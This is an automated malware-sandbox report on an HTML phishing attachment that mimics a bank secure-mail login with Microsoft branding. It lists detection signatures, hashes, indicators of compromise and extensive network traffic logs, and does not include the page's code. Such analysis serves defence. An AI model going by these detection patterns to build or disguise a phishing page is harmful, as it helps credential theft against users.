Windows Analysis Report
bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.html

Overview

General Information

Sample Name: bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.html
Analysis ID: 626103
MD5: bb0c6e89198797992503772ef06e95c0
SHA1: 52f29b0581c4d63fc3c6716c2c2e8574741fcda0
SHA256: f7db9d3408304aac67ef83179ab40ea97992aba9f8d6c80d4363d215f3416d93
Infos:

Detection

HTMLPhisher
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected HtmlPhish10
HTML document with suspicious title
Phishing site detected (based on image similarity)
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found

Classification

Phishing
barindex
Yara detected HtmlPhish10
Source: Yara match File source: 74548.0.pages.csv, type: HTML
Phishing site detected (based on image similarity)
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html Matcher: Found strong image similarity, brand: Microsoft image: 74548.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html Matcher: Found strong image similarity, brand: Microsoft image: 12183.1.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
None HTTPS page querying sensitive user data (password, username or email)
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: Has password / email / username input fields
No HTML title found
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Jump to behavior
Source: unknown HTTPS traffic detected: 51.11.233.143:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.11.233.143:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.35.236.56:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.135:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.64:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.64:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.40.129.122:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.40.129.122:443 -> 192.168.2.5:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.5:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49862 version: TLS 1.2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 13.107.246.60 13.107.246.60
Source: unknown DNS traffic detected: queries for: code.jquery.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.6
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.134
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220308T162912Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=178e458a29d04deda990b45f0b45a10d&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418274&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1418274&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6Cache-Control: no-cacheMS-CV: QXjzeVAaAUmzqs0S.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220308T162912Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=2998cbfae47745338f2b0b590b71e191&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418274&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=VMware7%2C1&tl=2&tsu=1418274&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6Cache-Control: no-cacheMS-CV: QXjzeVAaAUmzqs0S.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: tch0,m301,m751,mA01,mT01Host: arc.msn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.18694.9007199266247846.b5c49955-e050-4553-b8e4-0e223ed6c5a1.4e8e78d2-c2c2-4c02-8d8c-46ac3b2419e7?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.2052.9007199266247846.b5c49955-e050-4553-b8e4-0e223ed6c5a1.a0c3decd-308f-4f06-bcfb-2aa4f3afe248?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.16574.13571498826857201.00a9d390-581f-492c-b148-b2ce81649480.6a6f592e-efa9-4bb0-b008-7c3422ab3313?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.18858.9007199266246227.c596c546-6fcb-4260-935c-19bc24b971ef.1b03c26f-1753-4221-9ab1-4581f098723d?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.15881.13753891519397067.8011a592-e549-44a6-8073-41dcd83eddbe.bcf361e4-21f7-429d-877a-6c55c1b655ff?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.10288.13753891519397067.8011a592-e549-44a6-8073-41dcd83eddbe.12bb65f7-1014-4469-bb2e-59f575e79b05?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.256.14495311847124170.e89a4dce-fd9a-4a10-b8e4-a6c3aa1c055e.ca4cbefc-0ab0-4144-90c1-07f5250c8c21?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.20893.13571498826857201.00a9d390-581f-492c-b148-b2ce81649480.acc28f88-50de-4aaf-abfc-ad1da8b04cd0?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
